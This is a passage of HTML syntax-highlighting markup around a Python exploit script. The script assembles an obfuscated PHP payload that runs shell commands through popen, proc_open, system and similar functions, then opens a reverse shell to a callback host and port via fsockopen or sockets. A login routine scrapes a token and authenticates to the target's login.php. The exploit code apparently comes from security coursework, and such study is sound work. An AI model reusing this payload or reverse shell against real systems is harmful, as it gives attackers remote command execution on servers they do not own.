class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if($imARhD(&#8216;popen&#8217;)and!$kqqI(&#8216;popen&#8217;,$dis)){$fp=popen($c,&#8217;r&#8217;);&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=NULL;if(is_resource($fp)){while(!feof($fp)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o.=fread($fp,1024);}}@pclose($fp);}else&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if($imARhD(&#8216;proc_open&#8217;)and!$kqqI(&#8216;proc_open&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$handle=proc_open($c,array(array(pipe,&#8217;r&#8217;),array(pipe,&#8217;w&#8217;),array(pipe,&#8217;w&#8217;)),$pipes); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;@proc_close($handle);}else if($imARhD(&#8216;system&#8217;)and!$kqqI(&#8216;system&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;ob_start();system($c);$o=ob_get_contents();ob_end_clean(); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;}else if($imARhD(&#8216;passthru&#8217;)and!$kqqI(&#8216;passthru&#8217;,$dis)){ob_start();passthru($c); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=ob_get_contents();ob_end_clean(); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;}else if($imARhD(&#8216;shell_exec&#8217;)and!$kqqI(&#8216;shell_exec&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=shell_exec($c);}else if($imARhD(&#8216;exec&#8217;)and!$kqqI(&#8216;exec&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$nofuncs=&#8217;no exec functions&#8217;; &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if(is_callable(&#8216;fsockopen&#8217;)and!in_array(&#8216;fsockopen&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$s=@fsockopen(&#8216;tcp:\/\/%s&#8217;,&#8217;%s&#8217;);while($c=fread($s,2048)){$out = &#8221;; &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cb_host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if(substr($c,0,3) == &#8216;cd &#8216;){chdir(substr($c,3,-1)); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;}elseif (substr($c,0,4) == &#8216;quit&#8217; || substr($c,0,4) == &#8216;exit&#8217;){break;}else{ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;break;}}fwrite($s,$out);}fclose($s);}else{ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-97\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,&#8217;%s&#8217;,&#8217;%s&#8217;); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cb_host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-98\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;@socket_write($s,&#8221;<\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">_<\/span>create<span class=\"crayon-s\">&#8220;);while($c=@socket_read($s,2048)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-99\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$out = &#8221;;if(substr($c,0,3) == &#8216;cd &#8216;){chdir(substr($c,3,-1)); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-100\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;} else if (substr($c,0,4) == &#8216;quit&#8217; || substr($c,0,4) == &#8216;exit&#8217;) { &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-101\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-102\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-103\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;}@socket_close($s);} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;<span class=\"crayon-ta\">&lt;?php<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-ta\">?&gt;<\/span>&#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">phpkode<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-105\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-106\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">we_can_login<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-107\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-108\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;logs into the target<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-109\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-110\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) getting server token&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/login.php&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-112\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;) + &#8220;(.*)&#8221;)&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-113\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-114\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) found the token&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-115\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) logging in as %s&#8230;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">username<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-116\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;form_password_hidden&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">_get_hashed_password<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;form_login&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;submit&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8216;Login&#8217;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-117\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/login.php&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">allow_redirects<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">False<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">302<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;index.php&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;Location&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-119\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) failed to login, check your student password&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-122\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-123\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) failed to get the token&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-125\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-126\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">_build_zip<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-127\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span 